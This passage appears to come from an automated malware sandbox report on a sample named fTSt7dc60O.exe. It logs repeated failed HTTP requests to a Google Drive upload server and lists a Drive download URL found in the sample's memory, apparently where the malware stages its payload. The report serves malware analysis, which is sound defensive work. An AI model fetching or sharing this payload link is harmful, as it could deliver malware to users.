https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgR6qA1sjjLWHzUZmSgtHyxUeISbuFVdvKDyrpHt_EdQUc6cpAbYJdZg6V6V86vfC7jyZDvzEpEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:58 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-R34HUDyU8rT4i4KNzKOzYg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgR38k9ekxwDxSdsYR-3m1aY1A_jx5k62kG5pmCTOjq09a_O65wabBT-bFvZkMr9RjdRContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:00 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-VAEdNDbi0Lfe6pIvhAfwKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQqfCi4eVRg4oQApnPAvqVklbAgG2t8gSvdf3zcYeoTw_X6y9-27f3x9sn3_2JzfUjyXeaX2zUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:02 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-wKWt0sHf383pA4KBnIxx2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQXAhPWR9XxZT7Zf1avqSYLdKrJi9eWhWatEqjOHtg3NYPwz9SiLzN5HZ_Ofitno5DVContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:05 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-KyS7PoPuWwSleTI2YPIWJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRLN2hHNgHadDyjbHkDIejP_rc_PEBZvlpo8Zr1Nrw_4nLmhUHWWUUepfsPn57wBl9YContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:07 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-0XQU5w46C9o9sFj8tcf-MA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6YCsH2EuQyep-wImEfpcXIyghGGUnCucgEwKk7kWInKiiyHEFO2m46bAoHZkx6KMykContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:09 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-CYk39Zhs9tEnp8pXEabm4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQxFF9m1p7SgXmQmgCIoH_o0QEzvSqXbOgMJ0f3kvD8UXazqjuZwqoIWakRsu0aD0lAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:12 GMTContent-Security-Policy: script-src 'nonce--jXm5Q9HdG232UYPwLzM1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5LbuqbSvEbqSLdGWvuLGqnxUjQ2BD2TuRfWPix9tryIF6dBEE8LZCj7rQ3YFnCboWOw9JWCOIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:14 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-nwpEcFl54kIq_lOwwzg0Qw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Gr6TEF7uEmVvbqw8DUGGuffu-VDXaxs5Ue-FiRjd3fE5aMZ3iGD9kA45FIKsNiU9tgWvC0KsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:16 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-JbJgZJ1SAzmhQgKqq-3dLg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTf4FXDoalZDwr04025LGVKQSPmSk6BnRYaaRJULhZDYftohSGpwBVeGGd8FeQUe1xDContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:19 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-AGraDgHtaRFvNcblfixvfw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSL1uz_VrH_36FkOgcSfjl9mZ7z2oiNphIP-6Mh5y_yueGT42ql66dK6WLcIM5bUuR078VjD24Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:21 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-S9SwmJFYe-CTa6FZOAk84g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSEUf-K29TV9HspK0iSDM7RCSRVKz_kA2P1kbpvXmXkwhwemq6I7T49-nmDdVhGUd_DContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:23 GMTContent-Security-Policy: script-src 'nonce-Ym_zG50vr_fB-inpM67hIQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4BY1nMj23zxUvINk7iCRVYfwnM7SJyS59HLu01AxQcbEt_t1PMsBTa1puGL-7HJd-jContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:25 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-XNh2jNlbj1Z485zPG3wAcQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTBBergi_s54k7dUz975d3ixzRUK8TNFx8aKzjtZ2sRaKib5nquoehgflUCUTfplAuoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:28 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Dmo84NXbWAtznyBEhBK7TQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.0000000007188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadJ
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.00000000071E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download_
      Source: fTSt7dc60O.exe, 00000008.00000003.1592623794.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloada
